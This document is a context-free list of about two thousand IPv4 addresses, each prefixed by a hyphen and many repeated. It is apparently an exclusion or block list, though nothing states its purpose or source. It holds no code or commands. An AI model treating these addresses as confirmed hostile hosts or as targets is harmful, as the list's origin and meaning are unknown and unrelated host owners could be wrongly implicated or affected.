-114.84.24.69 -113.116.127.6 -153.99.240.213 -112.25.219.186 -218.204.17.245 -202.196.96.164 -118.202.207.26 -202.196.96.164 -222.186.119.241 -58.17.217.20 -202.196.96.164 -219.141.248.219 -218.62.11.26 -210.42.160.57 -202.196.96.164 -202.196.96.164 -60.162.160.56 -171.214.206.18 -202.196.96.164 -221.213.162.248 -202.196.96.164 -218.23.35.35 -116.243.81.145 -202.196.96.164 -122.227.14.214 -183.146.103.115 -202.196.96.164 -202.196.96.164 -183.234.241.43 -120.195.132.87 -180.142.178.111 -223.221.36.18 -220.191.181.162 -116.1.144.144 -115.224.77.253 -60.162.11.91 -58.16.244.42 -183.224.86.201 -202.196.96.164 -210.44.195.140 -58.210.16.34 -113.102.147.4 -221.209.38.145 -202.196.96.164 -115.216.132.204 -183.14.76.77 -212.129.141.208 -220.166.243.190 -120.35.101.30 -122.228.177.86 -202.196.96.164 -112.255.78.68 -106.12.42.160 -61.160.136.88 -188.131.156.139 -220.194.186.110 -39.77.20.56 -113.102.131.229 -112.27.251.13 -202.196.96.164 -222.80.142.106 -61.183.215.2 -60.189.98.202 -49.75.25.51 -112.112.41.224 -113.91.250.4 -120.119.77.81 -219.146.1.145 -183.143.29.4 -218.15.144.13 -117.141.74.146 -122.245.82.243 -14.104.102.23 -183.149.102.40 -218.0.174.137 -47.98.17.253 -180.109.147.93 -202.196.96.164 -111.198.128.143 -183.194.240.37 -218.80.250.75 -122.228.177.86 -119.254.161.139 -117.158.243.78 -47.95.193.56 -112.244.104.62 -202.196.96.164 -111.230.130.219 -123.206.80.9 -123.159.11.49 -221.226.115.8 -61.168.22.102 -58.16.244.42 -61.185.7.147 -113.110.200.148 -113.88.248.230 -60.177.6.0 -201.157.59.232 -45.236.240.90 -189.90.58.210 -80.255.65.99 -94.130.193.253 -94.130.193.251 -94.130.193.255 -45.236.240.90 -91.121.37.169 -212.210.177.32 -146.12.194.69 -189.90.58.213 -18.229.157.194 -199.38.185.2 -94.130.253.227 -94.130.253.226 -94.130.253.224 -94.130.253.225 -94.130.253.230 -80.255.65.99 -177.7.11.69 -209.182.164.41 -167.216.134.134 -212.68.161.242 -117.252.85.142 -45.236.240.90 -223.62.231.179 -176.109.167.116 -201.217.129.178 -64.71.189.210 -183.88.214.182 -176.109.167.116 -54.207.94.154 -146.12.193.132 -45.236.240.90 -212.211.173.204 -179.104.164.178 -186.224.231.93 -81.25.210.33 -52.201.6.2 -189.17.53.135 -88.249.165.66 -45.236.240.90 -194.48.244.102 -34.194.52.156 -45.236.240.90 -52.8.40.167 -80.190.65.0 -183.88.214.182 -54.190.76.84 -103.136.114.132 -52.37.47.139 -201.20.93.66 -119.17.209.227 -179.152.32.64 -192.101.9.130 -43.251.18.5 -45.236.240.90 -52.23.96.223 -93.47.183.203 -192.101.9.130 -162.252.237.52 -45.236.240.90 -45.236.240.90 -52.25.251.44 -213.144.25.72 -179.179.134.203 -67.109.224.164 -183.88.214.182 -177.180.6.214 -187.94.99.166 -213.81.160.18 -52.166.52.114 -202.52.15.82 -89.44.226.73 -85.9.23.78 -187.141.226.46 -200.253.156.10 -45.236.240.90 -187.86.212.131 -186.214.176.175 -199.127.122.133 -52.11.236.246 -179.99.212.82 -35.169.161.98 -183.88.214.182 -159.146.58.195 -189.58.107.122 -193.230.241.4 -45.236.240.90 -52.87.71.151 -202.29.15.27 -217.5.211.237 -50.112.186.57 -200.146.119.161 -45.236.240.90 -195.101.103.115 -3.215.183.132 -52.87.71.142 -183.88.214.182 -93.57.25.85 -186.206.226.32 -189.201.249.3 -200.75.18.27 -204.13.32.57 -187.189.235.100 -152.78.118.12 -146.148.33.251 -88.119.154.115 -52.178.8.64 -193.233.10.21 -50.30.96.132 -194.176.109.157 -52.3.22.234 -200.179.23.37 -45.189.119.97 -183.88.214.182 -170.254.234.24 -192.101.9.131 -50.30.96.132 -189.59.17.182 -186.137.205.125 -183.88.214.182 -45.236.240.90 -190.63.175.169 -181.60.245.161 -31.216.41.59 -187.86.212.134 -199.66.220.186 -168.121.97.54 -113.161.116.44 -201.217.138.134 -183.88.214.182 -185.54.185.171 -45.236.240.90 -119.2.118.103 -191.253.107.8 -40.121.147.252 -200.55.74.19 -116.203.66.219 -203.121.77.243 -210.19.20.13 -13.248.167.3 -191.26.70.61 -186.3.19.85 -20.88.105.56 -189.58.151.206 -180.232.98.94 -34.213.26.245 -189.210.155.139 -189.210.155.140 -81.250.215.95 -189.210.155.138 -87.110.211.128 -80.82.213.104 -58.71.194.74 -43.242.101.76 -195.101.103.116 -81.215.63.123 -50.30.96.150 -109.70.138.242 -103.91.67.146 -68.67.124.4 -54.85.134.71 -179.178.242.124 -71.19.200.226 -54.211.97.97 -23.135.64.23 -153.127.12.60 -194.176.109.149 -193.226.144.175 -193.226.144.190 -162.254.130.18 -23.111.106.183 -5.35.254.187 -138.36.98.38 -84.204.165.182 -78.186.179.26 -186.249.10.118 -74.51.209.230 -45.236.240.90 -200.187.60.101 -54.169.146.246 -41.96.124.187 -200.125.34.122 -171.22.25.127 -186.208.221.112 -138.201.156.202 -190.144.244.55 -162.222.31.214 -63.249.54.18 -50.16.141.218 -201.217.141.130 -104.210.32.74 -34.206.203.82 -193.30.141.211 -162.223.141.216 -167.71.210.3 -177.43.210.178 -193.226.144.172 -200.128.85.177 -54.253.148.86 -162.223.141.202 -50.224.50.115 -190.0.133.231 -117.212.191.17 -34.132.66.81 -191.31.160.192 -34.226.71.76 -200.179.75.143 -187.63.222.132 -207.35.252.13 -117.213.34.189 -187.73.233.2 -152.70.210.160 -79.231.236.134 -179.27.126.12 -63.251.188.85 -20.185.61.202 -63.251.188.86 -181.213.55.209 -190.128.222.170 -190.210.182.125 -198.12.17.23 -177.4.172.84 -54.88.133.92 -202.183.208.107 -64.56.216.2 -172.105.207.84 -34.239.72.61 -64.7.163.3 -85.13.239.210 -3.7.229.229 -199.127.122.154 -13.228.55.159 -196.92.11.136 -180.232.98.93 -13.234.45.168 -14.186.112.209 -45.236.240.90 -187.217.220.34 -199.48.170.11 -31.216.41.63 -117.194.134.108 -117.217.213.244 -189.45.207.129 -170.80.70.20 -34.230.64.167 -52.76.22.45 -59.88.187.195 -117.213.37.117 -67.109.224.164 -58.69.236.9 -133.242.5.193 -194.156.152.136 -177.185.141.121 -70.63.186.98 -178.255.138.242 -12.167.48.50 -34.194.52.156 -72.166.251.6 -177.135.248.94 -179.107.233.229 -190.131.197.76 -34.198.15.138 -69.162.109.182 -201.221.0.231 -150.162.1.22 -59.92.176.180 -24.41.66.189 -177.43.44.146 -77.89.0.202 -194.176.109.168 -67.211.121.140 -82.69.228.173 -177.50.160.76 -3.0.25.5 -64.139.127.67 -177.69.142.51 -200.233.156.143 -120.72.110.133 -41.97.56.129 -140.238.176.2 -103.10.231.25 -212.122.92.130 -200.143.34.181 -189.100.193.80 -117.120.25.21 -52.19.103.161 -179.27.152.242 -64.18.242.2 -193.226.144.165 -185.160.48.228 -180.232.98.91 -43.242.101.4 -34.72.13.8 -67.130.117.149 -185.160.48.227 -88.99.2.45 -187.181.141.219 -199.71.210.180 -85.13.244.246 -189.57.191.82 -117.200.77.179 -13.229.109.147 -138.36.98.35 -212.237.47.248 -194.176.109.145 -181.65.214.107 -117.222.143.47 -201.93.159.169 -109.70.139.71 -199.38.185.2 -199.38.185.3 -117.212.176.155 -59.88.188.141 -201.217.136.114 -59.92.189.90 -138.36.98.34 -213.81.151.11 -117.221.131.172 -31.134.62.103 -104.209.245.203 -61.2.65.108 -176.94.183.213 -201.221.26.184 -179.108.175.43 -200.124.219.91 -181.39.23.14 -34.234.246.253 -104.243.1.4 -66.182.128.199 -117.217.213.182 -117.212.190.133 -64.74.135.109 -31.216.41.55 -81.198.161.8 -187.21.213.149 -200.135.190.64 -177.159.155.60 -190.128.222.6 -160.16.227.205 -59.90.84.144 -177.124.216.234 -34.229.51.19 -58.69.113.192 -124.107.91.77 -18.188.137.51 -160.16.238.226 -84.33.91.125 -145.239.73.226 -59.90.85.3 -117.194.129.100 -54.94.236.53 -177.1.128.112 -194.176.109.144 -117.212.183.249 -138.36.98.36 -194.176.109.138 -138.36.98.46 -201.41.123.103 -117.215.178.76 -176.42.232.204 -117.247.23.96 -117.215.178.68 -59.92.84.162 -190.99.107.130 -115.87.176.105 -34.226.254.135 -102.177.192.187 -179.228.246.216 -201.217.152.59 -63.32.208.205 -117.193.213.141 -171.103.161.118 -3.19.190.82 -117.217.214.226 -66.182.149.20 -117.216.137.162 -199.127.122.132 -72.2.130.227 -31.216.41.125 -69.28.33.100 -69.28.33.101 -117.201.27.18 -179.191.67.70 -193.95.251.28 -66.187.114.203 -177.32.196.155 -216.144.96.3 -117.217.209.44 -153.126.161.84 -181.81.140.125 -103.80.63.66 -200.165.167.51 -200.58.154.180 -117.212.191.197 -212.170.18.70 -193.226.144.163 -183.88.214.182 -198.41.36.23 -180.232.98.92 -212.37.83.134 -177.206.131.171 -203.210.244.175 -88.247.217.140 -59.92.107.8 -193.226.144.186 -66.94.100.159 -189.90.58.211 -51.68.105.123 -193.226.144.170 -193.226.144.184 -52.37.143.154 -94.140.123.36 -117.221.69.96 -3.141.112.243 -193.226.144.181 -176.58.117.41 -171.22.25.127 -193.226.144.173 -120.72.110.135 -168.138.141.119 -94.140.123.67 -50.30.96.133 -177.137.237.170 -194.59.153.48 -190.64.208.178 -117.206.129.135 -186.103.231.59 -186.158.183.232 -189.154.132.255 -52.74.70.160 -199.127.122.137 -190.210.225.128 -200.124.219.91 -117.217.209.161 -200.239.64.23 -88.26.235.89 -2.89.107.204 -193.226.144.178 -117.247.182.39 -201.48.62.12 -193.226.144.180 -207.35.252.2 -193.226.144.162 -193.226.144.187 -23.106.36.5 -14.139.176.59 -170.78.75.184 -193.226.144.171 -102.177.192.195 -52.74.130.229 -190.210.182.96 -195.23.97.244 -54.245.77.247 -61.2.46.168 -109.169.22.50 -46.19.204.254 -183.88.214.182 -59.96.231.138 -186.19.100.175 -177.133.8.95 -200.125.28.162 -117.202.141.102 -59.93.162.61 -59.92.91.112 -117.194.131.39 -34.66.20.253 -189.63.215.178 -177.8.166.65 -200.156.151.145 -109.70.138.201 -67.211.121.139 -87.138.233.138 -160.16.208.171 -201.40.29.55 -59.92.189.19 -178.170.224.84 -83.167.54.20 -193.226.144.164 -193.226.144.185 -138.204.202.72 -37.48.106.138 -194.176.109.188 -194.176.109.152 -31.216.41.108 -194.176.109.163 -178.170.224.85 -187.183.209.219 -87.246.164.138 -59.88.179.72 -138.36.97.182 -201.90.148.163 -186.50.63.250 -154.205.21.8 -64.139.127.66 -51.15.157.7 -61.2.37.224 -113.161.116.43 -189.121.190.157 -202.241.170.160 -37.48.106.141 -37.48.106.140 -52.20.43.3 -189.34.149.1 -199.127.122.136 -197.204.54.254 -153.127.39.89 -117.221.10.125 -80.157.73.218 -13.233.0.86 -117.217.208.26 -3.13.177.5 -54.169.12.211 -189.90.58.212 -196.34.30.187 -52.221.4.88 -93.57.25.85 -186.225.110.218 -83.118.16.227 -190.144.244.58 -199.243.245.178 -81.180.221.36 -117.252.85.142 -58.64.3.90 -117.212.179.37 -200.40.210.226 -162.252.237.52 -177.220.252.123 -200.199.79.104 -62.102.254.173 -189.90.58.214 -82.223.49.248 -212.156.98.90 -212.43.97.3 -117.241.216.29 -179.27.200.239 -5.252.230.181 -176.88.214.247 -189.89.178.102 -45.236.240.90 -200.155.164.22 -200.2.49.101 -117.201.8.157 -186.23.252.41 -94.140.123.144 -59.93.68.37 -139.162.240.21 -18.219.176.20 -201.6.109.104 -210.116.109.171 -71.19.200.227 -60.51.208.104 -45.236.240.90 -167.56.98.9 -8.8.249.162 -187.72.249.106 -194.176.109.184 -59.96.230.69 -189.231.144.66 -194.176.109.170 -43.242.101.3 -193.226.144.182 -143.117.14.141 -117.216.44.173 -117.194.140.107 -117.200.157.14 -134.209.122.59 -137.119.32.34 -62.94.56.23 -45.236.240.90 -194.182.159.155 -189.5.134.54 -177.37.164.34 -117.200.184.212 -113.161.8.98 -43.242.101.14 -187.120.1.126 -59.92.106.166 -38.92.61.90 -139.162.250.21 -117.217.210.223 -59.96.57.68 -117.202.136.244 -54.185.239.213 -59.92.181.56 -69.80.192.82 -117.221.243.84 -117.194.130.239 -117.241.217.143 -183.88.214.182 -138.36.98.37 -117.217.212.109 -31.14.19.15 -216.144.96.2 -61.2.217.100 -188.34.192.169 -117.212.190.206 -159.148.46.154 -77.93.27.90 -117.215.127.54 -187.11.236.13 -54.209.82.14 -40.76.61.36 -178.170.224.82 -200.40.212.150 -59.92.107.71 -52.72.203.226 -193.226.90.202 -45.33.125.157 -193.226.144.191 -170.80.70.18 -35.153.73.30 -13.228.229.170 -133.242.5.234 -178.254.101.169 -83.56.10.19 -117.201.24.169 -23.106.62.22 -193.226.144.167 -193.226.144.169 -170.80.70.19 -177.74.79.175 -170.80.70.21 -187.5.170.210 -31.216.41.7 -81.192.9.198 -208.103.14.36 -193.226.144.168 -201.16.162.129 -52.25.227.217 -117.197.194.168 -80.211.15.150 -181.13.229.114 -14.192.159.214 -66.182.149.34 -31.216.41.12 -187.38.46.235 -193.226.144.189 -59.88.187.24 -172.105.210.109 -193.226.144.188 -3.132.101.29 -193.226.144.174 -82.142.100.18 -103.153.140.221 -31.216.41.57 -103.233.180.15 -82.76.174.107 -186.223.231.210 -52.67.203.7 -117.241.218.189 -181.111.221.242 -117.193.201.162 -122.176.102.239 -68.67.124.5 -199.127.122.133 -201.33.199.184 -152.67.164.176 -59.92.92.39 -212.156.94.134 -201.217.141.26 -90.63.200.192 -80.211.91.74 -194.176.109.190 -59.90.97.192 -186.212.127.168 -185.3.93.83 -181.24.151.51 -120.28.151.87 -59.98.58.155 -59.92.107.98 -195.76.31.132 -191.240.255.55 -181.120.191.186 -195.13.199.212 -190.64.142.116 -138.36.97.178 -130.237.161.143 -91.223.250.77 -194.176.109.135 -59.98.59.71 -189.112.108.201 -117.194.138.6 -191.178.148.226 -54.234.254.181 -138.122.165.122 -92.243.6.55 -193.226.144.179 -81.215.63.123 -178.170.224.83 -177.89.245.201 -117.217.212.86 -177.75.64.28 -194.176.109.136 -153.126.158.201 -194.176.109.185 -160.16.116.168 -117.216.45.212 -117.200.178.206 -210.116.109.170 -194.176.109.156 -152.250.243.216 -190.64.94.141 -152.14.92.184 -117.221.0.180 -193.111.245.198 -136.158.252.155 -31.216.41.61 -117.221.245.84 -45.45.36.222 -186.158.183.234 -83.103.186.144 -46.243.119.28 -177.159.123.241 -23.106.62.80 -67.109.224.163 -31.216.41.62 -129.151.32.149 -31.216.41.16 -201.217.140.202 -34.224.135.6 -3.221.112.171 -59.99.228.29 -61.2.32.216 -84.237.195.20 -194.176.109.141 -117.221.244.190 -112.199.118.125 -94.140.123.253 -108.174.123.178 -23.106.61.72 -72.2.130.226 -91.216.103.42 -131.196.131.31 -117.193.201.86 -94.142.237.181 -59.99.228.20 -81.149.136.225 -59.91.156.248 -194.79.87.121 -117.221.237.106 -117.241.70.128 -59.95.162.110 -61.19.29.248 -34.238.69.170 -94.43.99.58 -122.155.136.218 -129.159.59.191 -95.19.179.91 -201.91.150.154 -201.217.145.163 -69.28.33.118 -152.244.244.13 -190.64.65.164 -119.92.150.131 -219.92.12.253 -194.176.109.177 -54.233.154.55 -61.2.35.208 -117.200.177.93 -175.141.145.175 -193.226.144.166 -61.3.201.67 -160.16.209.129 -94.140.123.231 -89.44.226.73 -189.11.235.211 -34.224.113.3 -74.203.152.115 -203.115.196.131 -59.88.183.238 -102.177.192.204 -162.254.130.19 -113.161.116.41 -117.200.179.9 -130.237.161.78 -69.28.33.100 -45.236.240.90 -190.2.12.155 -206.82.209.252 -91.218.224.17 -177.66.12.138 -23.106.62.26 -185.29.79.192 -45.236.240.90 -54.207.39.248 -183.88.214.182 -18.214.57.164 -18.230.102.221 -113.161.116.43 -45.236.240.90 -109.224.64.6 -216.218.206.2 -54.89.105.107 -45.175.144.245 -191.7.191.18 -189.7.74.229 -52.71.186.41 -200.201.177.194 -34.132.66.81 -45.236.240.90 -50.227.50.106 -45.236.240.90 -177.69.83.139 -103.87.196.127 -190.12.100.104 -138.94.11.227 -54.88.93.179 -34.196.7.189 -183.88.214.182 -52.205.54.0 -64.15.174.139 -200.98.163.159 -52.33.246.240 -187.86.212.130 -52.238.106.150 -54.204.174.139 -200.143.34.228 -78.83.12.242 -43.224.139.168 -68.67.124.4 -197.159.66.179 -40.68.174.31 -35.239.220.54 -89.36.143.5 -52.138.140.75 -43.224.139.169 -187.44.83.106 -64.7.163.2 -193.231.147.41 -50.30.96.150 -45.236.240.90 -44.239.155.240 -78.136.12.187 -185.29.79.194 -203.77.246.122 -52.20.171.2 -87.246.164.138 -81.169.131.165 -74.208.162.190 -93.240.205.213 -45.40.160.52 -183.88.214.182 -54.253.148.86 -35.182.117.5 -80.82.213.104 -196.203.216.110 -162.223.141.213 -130.237.161.78 -213.210.228.52 -52.31.71.48 -23.97.195.14 -91.218.224.168 -44.193.114.227 -54.196.11.6 -109.74.6.32 -213.187.74.98 -23.23.174.119 -66.175.147.174 -69.28.33.118 -76.223.35.123 -72.2.130.227 -64.15.174.136 -50.30.96.133 -207.104.75.231 -54.186.83.135 -167.216.134.139 -201.157.59.231 -43.224.139.166 -104.40.204.137 -69.28.33.101 -124.158.162.10 -49.206.240.154 -194.48.34.18 -158.122.132.21 -54.245.33.26 -195.175.60.182 -213.187.74.100 -82.113.183.14 -85.90.3.49 -34.198.123.214 -44.196.12.115 -104.243.1.4 -3.218.171.191 -217.128.9.246 -83.219.0.214 -18.116.56.125 -3.22.141.66 -3.224.32.3 -34.225.78.164 -43.224.139.165 -189.41.20.237 -185.29.79.195 -34.194.36.151 -66.182.149.20 -176.42.232.204 -91.216.103.41 -52.166.8.155 -62.196.61.35 -207.144.250.6 -67.211.121.140 -185.29.79.219 -199.127.122.136 -54.94.182.162 -91.121.46.207 -72.2.130.226 -176.124.251.97 -194.48.34.13 -107.20.214.199 -54.233.145.176 -67.211.121.139 -204.28.1.79 -67.130.117.149 -52.7.82.166 -46.39.254.131 -41.77.66.16 -212.43.97.3 -66.97.33.171 -199.38.185.3 -91.92.214.9 -216.7.125.41 -85.90.3.46 -207.144.250.4 -148.243.155.37 -211.27.255.36 -134.48.24.210 -213.60.205.37 -64.15.174.133 -192.101.9.131 -3.98.71.205 -193.174.232.54 -40.74.62.232 -54.157.70.144 -76.223.23.86 -72.24.104.202 -176.221.91.99 -93.51.173.137 -184.73.59.160 -3.13.190.230 -3.97.2.55 -184.159.69.133 -193.111.10.132 -183.88.214.182 -54.209.82.14 -34.72.13.8 -43.224.139.167 -201.17.247.72 -52.204.113.91 -130.237.161.143 -40.70.79.242 -43.224.139.173 -72.167.109.181 -213.60.205.38 -54.67.117.10 -101.110.49.5 -103.228.19.204 -54.186.143.230 -187.86.212.135 -82.213.48.146 -194.29.168.11 -3.22.230.193 -167.114.142.181 -52.72.111.199 -54.36.183.236 -85.90.3.45 -211.27.255.37 -194.48.34.12 -104.45.8.112 -54.71.240.16 -54.172.53.200 -200.239.64.200 -158.224.83.75 -189.112.78.8 -167.216.134.140 -184.159.69.132 -93.240.189.202 -167.216.134.136 -54.236.232.44 -193.164.142.143 -203.77.233.164 -34.201.3.45 -63.228.189.196 -44.236.13.41 -170.145.102.12 -64.7.163.3 -70.63.186.98 -45.236.240.90 -103.136.114.141 -13.93.121.174 -34.202.124.43 -109.74.2.5 -104.192.6.173 -201.156.82.198 -152.228.220.233 -195.55.52.189 -203.125.67.216 -85.194.241.237 -52.203.141.218 -3.209.229.241 -179.27.126.19 -69.46.7.35 -132.148.11.181 -190.196.18.107 -54.85.8.170 -91.93.68.38 -184.72.139.164 -103.41.32.203 -88.255.146.140 -104.40.180.96 -82.77.1.254 -146.88.64.83 -182.70.124.81 -167.216.134.135 -167.216.134.133 -34.230.69.242 -201.156.82.197 -80.153.112.10 -110.170.243.104 -34.224.143.74 -190.58.139.152 -40.68.173.22 -212.60.80.22 -194.48.34.16 -52.67.59.229 -216.23.211.218 -198.136.36.236 -107.0.141.231 -54.159.255.239 -3.13.160.131 -206.161.23.163 -210.245.99.234 -115.131.131.199 -20.50.172.68 -207.144.250.5 -209.143.234.146 -209.143.234.143 -132.148.10.97 -185.160.48.227 -3.223.141.249 -209.143.234.97 -195.201.29.182 -204.16.106.104 -35.169.161.98 -54.233.96.240 -120.50.44.233 -182.74.105.110 -50.194.137.69 -180.183.124.36 -112.109.91.210 -139.138.128.153 -139.138.128.149 -202.137.22.21 -52.233.198.81 -103.136.114.140 -3.233.194.126 -177.71.153.246 -54.207.57.68 -209.143.234.147 -75.101.247.177 -18.230.63.175 -209.143.234.142 -34.206.219.43 -148.240.194.69 -138.201.156.202 -67.109.224.163 -54.146.135.10 -101.53.141.68 -80.146.197.153 -35.167.127.59 -104.40.153.112 -35.182.13.128 -186.202.182.191 -112.109.91.213 -187.49.223.111 -62.183.181.115 -80.27.123.40 -35.182.190.115 -193.30.141.211 -128.136.227.205 -37.252.123.143 -147.50.132.81 -199.127.122.154 -187.94.98.229 -170.210.203.68 -147.174.1.125 -94.176.180.23 -154.58.18.12 -178.170.224.85 -178.170.224.82 -178.170.224.84 -178.170.224.83 -209.143.234.139 -209.143.234.97 -209.143.234.195 -64.56.216.2 -64.18.242.2 -120.72.110.133 -103.210.73.249 -52.174.106.118 -61.110.100.76 -120.72.110.135 -85.90.3.45 -54.169.12.211 -13.230.129.178 -192.101.9.130 -200.71.162.41 -207.144.250.5 -70.182.222.252 -207.144.250.6 -211.29.152.118 -31.216.41.61 -213.60.205.36 -213.60.205.38 -195.246.49.13 -160.16.238.226 -50.194.137.69 -54.204.174.139 -52.54.204.0 -167.216.134.139 -85.90.3.49 -82.113.183.14 -209.143.234.109 -193.49.18.239 -199.192.202.50 -60.54.35.157 -177.153.8.152 -194.48.244.98 -45.33.5.58 -85.214.107.50 -3.13.177.5 -194.59.153.48 -200.137.6.98 -82.113.183.13 -66.182.149.20 -31.216.40.150 -54.227.71.247 -202.79.18.236 -47.254.234.152 -153.126.161.84 -45.33.119.181 -206.161.23.172 -172.104.194.177 -210.109.94.4 -206.161.23.164 -199.38.185.3 -210.109.94.17 -199.38.185.2 -161.82.200.227 -204.13.32.57 -190.6.72.198 -51.68.185.203 -44.196.12.115 -199.127.122.133 -199.127.122.132 -179.95.126.202 -54.184.238.146 -54.225.199.124 -93.186.183.73 -190.7.99.74 -213.214.150.220 -72.24.104.202 -64.15.174.101 -198.58.99.127 -104.237.129.108 -199.192.202.50 -186.202.182.191 -146.12.193.12 -146.12.193.23 -201.157.59.232 -54.169.146.246 -68.67.124.4 -212.112.107.252 -34.206.129.3 -52.20.43.3 -52.72.4.61 -200.143.14.23 -171.22.25.127 -200.69.103.23 -34.72.13.8 -52.74.130.229 -209.143.234.13 -202.131.110.74 -199.48.170.11 -63.251.188.85 -96.126.120.79 -139.162.250.21 -195.182.206.246 -45.234.254.184 -81.1.221.138 -81.45.140.46 -161.0.124.50 -78.136.8.145 -188.165.33.37 -115.133.208.41 -177.125.178.14 -202.152.23.70 -104.243.1.4 -3.132.101.29 -172.105.47.106 -91.121.217.75 -43.243.126.39 -185.160.48.228 -52.9.62.49 -187.75.165.123 -213.238.178.167 -80.27.123.40 -75.101.247.177 -68.67.124.5 -197.253.13.203 -52.1.162.246 -78.136.12.187 -121.122.124.78 -71.19.200.226 -23.135.64.23 -177.135.248.94 -207.144.250.4 -50.16.141.218 -179.152.32.64 -162.247.215.74 -3.0.25.5 -129.232.155.186 -190.226.21.104 -216.144.96.3 -94.45.131.130 -54.246.139.15 -66.228.49.194 -36.81.156.161 -54.172.53.200 -146.12.193.210 -67.211.121.139 -146.12.193.69 -185.173.27.34 -82.213.48.146 -146.12.193.79 -146.12.193.81 -43.243.127.92 -13.81.52.2 -52.76.22.45 -146.12.193.127 -146.12.193.116 -66.182.149.34 -146.12.194.42 -213.145.151.186 -72.2.130.227 -63.249.54.18 -37.159.131.134 -200.14.200.13 -146.12.193.80 -202.160.125.7 -212.112.107.252 -34.224.143.74 -213.238.178.228 -112.109.91.213 -112.109.91.210 -162.254.130.19 -45.162.68.31 -103.136.114.140 -41.219.127.127 -146.12.194.47 -52.232.36.43 -162.252.237.52 -103.136.114.132 -173.255.201.243 -35.182.117.5 -153.126.158.201 -91.121.51.157 -67.229.79.179 -162.222.31.214 -38.92.61.90 -201.48.128.161 -199.71.210.180 -139.138.128.153 -104.154.202.115 -213.187.74.97 -34.66.20.253 -160.16.116.168 -52.232.35.94 -45.33.21.238 -189.112.63.177 -64.15.174.131 -160.16.208.171 -64.139.127.66 -18.204.57.121 -34.205.13.186 -89.101.192.9 -64.15.174.132 -195.112.122.7 -177.159.155.170 -69.20.105.203 -190.196.15.109 -123.30.19.19 -153.127.39.89 -64.139.127.67 -213.81.160.18 -216.241.16.28 -206.161.23.163 -103.141.208.117 -206.161.23.170 -206.161.23.171 -162.223.141.198 -185.3.93.116 -35.239.220.54 -206.161.23.162 -52.204.113.91 -209.143.234.139 -193.146.1.93 -213.187.74.103 -40.118.44.62 -89.249.20.75 -216.130.95.33 -200.45.78.170 -201.217.137.66 -52.5.183.10 -91.243.118.202 -87.110.211.126 -34.201.3.45 -54.184.238.146 -146.148.56.142 -3.233.194.126 -45.236.240.90 -45.33.112.157 -34.123.2.177 -58.27.97.49 -5.2.150.190 -81.25.210.33 -72.43.8.122 -3.141.112.243 -194.48.244.101 -168.138.239.123 -194.176.109.144 -216.7.125.42 -194.176.109.190 -194.176.109.136 -52.203.141.218 -179.27.126.13 -194.176.109.141 -199.66.220.186 -202.129.39.217 -216.144.96.2 -71.19.200.227 -80.157.73.218 -178.244.248.37 -107.161.68.107 -92.243.6.55 -66.228.49.149 -109.70.138.236 -157.164.184.234 -64.15.174.135 -160.16.227.205 -160.16.209.129 -183.81.129.68 -195.228.124.81 -3.212.216.213 -54.157.69.151 -64.15.174.195 -64.15.174.185 -103.210.73.119 -41.77.66.16 -162.254.130.18 -184.72.72.157 -209.143.234.145 -199.202.27.22 -24.41.66.177 -202.52.15.82 -85.105.247.231 -139.138.128.149 -66.97.33.171 -35.182.190.115 -120.72.110.134 -138.201.156.202 -45.33.113.128 -3.233.175.80 -213.153.177.18 -84.17.211.20 -193.230.241.4 -50.30.96.132 -64.15.174.134 -3.220.21.146 -54.208.108.96 -50.30.96.133 -74.208.154.48 -35.169.161.98 -72.14.178.9 -103.233.180.15 -69.28.33.118 -219.92.68.60 -37.187.75.112 -94.176.180.23 -77.109.151.142 -185.17.196.194 -45.236.240.90 -18.140.103.115 -187.189.37.227 -74.208.162.190 -82.114.168.10 -109.224.64.6 -165.233.109.71 -210.245.99.234 -185.17.196.194 -208.78.163.74 -66.182.128.199 -201.7.234.3 -62.242.67.180 -104.237.133.103 -149.202.95.4 -31.216.41.55 -148.243.155.37 -3.238.105.199 -194.48.34.15 -117.120.25.21 -54.200.149.188 -67.211.121.140 -52.209.207.19 -83.61.8.92 -138.94.38.29 -52.33.141.255 -34.206.219.43 -52.77.233.142 -176.221.91.99 -148.240.194.68 -200.27.105.22 -31.206.63.244 -162.223.141.198 -64.15.174.139 -170.225.128.43 -101.53.141.68 -118.101.26.128 -141.95.18.142 -52.201.50.89 -196.30.77.124 -196.30.77.122 -54.196.11.6 -45.56.73.234 -217.56.64.17 -91.121.111.175 -123.30.19.14 -45.58.5.101 -34.226.71.76 -211.29.133.135 -3.223.141.249 -217.169.111.162 -3.209.229.241 -67.130.117.149 -34.194.52.156 -51.75.28.90 -83.219.0.214 -94.180.121.164 -54.202.181.197 -91.121.219.129 -51.75.28.56 -45.33.127.249 -23.106.61.66 -199.101.246.205 -31.216.41.57 -45.79.9.146 -31.216.41.59 -31.216.41.125 -187.108.204.246 -31.216.41.108 -31.216.41.62 -31.216.41.63 -194.182.159.153 -18.214.57.164 -78.187.168.11 -131.0.246.226 -74.208.167.138 -68.67.124.5 -217.221.16.124 -100.26.196.193 -176.221.8.174 -52.20.171.2 -74.208.193.66 -63.228.189.196 -194.176.109.145 -194.176.109.170 -78.186.38.107 -194.176.109.188 -170.247.9.97 -31.216.41.12 -194.176.109.157 -179.27.154.9 -194.176.109.156 -31.216.41.7 -103.94.52.49 -200.143.34.228 -200.143.34.203 -199.101.246.173 -194.176.109.163 -194.176.109.135 -146.12.193.33 -194.176.109.152 -13.228.55.159 -167.216.134.131 -3.19.190.82 -167.216.134.132 -146.12.193.35 -64.7.163.3 -13.228.229.170 -63.251.188.86 -64.7.163.2 -177.149.159.60 -3.234.86.27 -45.79.51.152 -45.33.25.83 -185.227.111.208 -194.94.133.236 -217.169.111.43 -82.165.119.213 -211.29.132.244 -209.143.234.14 -45.33.125.87 -191.240.146.74 -34.202.124.43 -187.75.245.69 -216.81.30.52 -211.29.152.64 -67.109.224.164 -69.164.202.82 -52.233.198.81 -144.208.2.153 -95.9.237.175 -50.227.50.106 -52.8.40.167 -213.60.205.37 -103.17.238.212 -35.166.115.253 -54.67.117.10 -199.127.122.137 -108.174.123.178 -199.127.122.136 -184.72.139.164 -103.17.238.218 -45.191.204.3 -189.89.232.118 -194.176.109.177 -194.176.109.184 -200.127.232.198 -196.7.156.4 -137.119.32.34 -13.68.108.248 -146.12.193.113 -146.12.193.84 -200.146.242.97 -200.123.3.20 -69.28.33.101 -54.157.69.151 -74.219.165.131 -82.223.49.248 -54.201.143.20 -34.219.49.94 -193.111.10.132 -69.28.33.100 -43.243.127.92 -87.103.240.194 -210.116.109.170 -38.92.140.7 -46.39.254.131 -45.79.45.9 -218.248.2.228 -118.69.218.82 -54.144.135.121 -148.240.194.69 -148.240.194.68 -52.87.71.151 -54.204.243.211 -8.35.197.226 -72.28.97.37 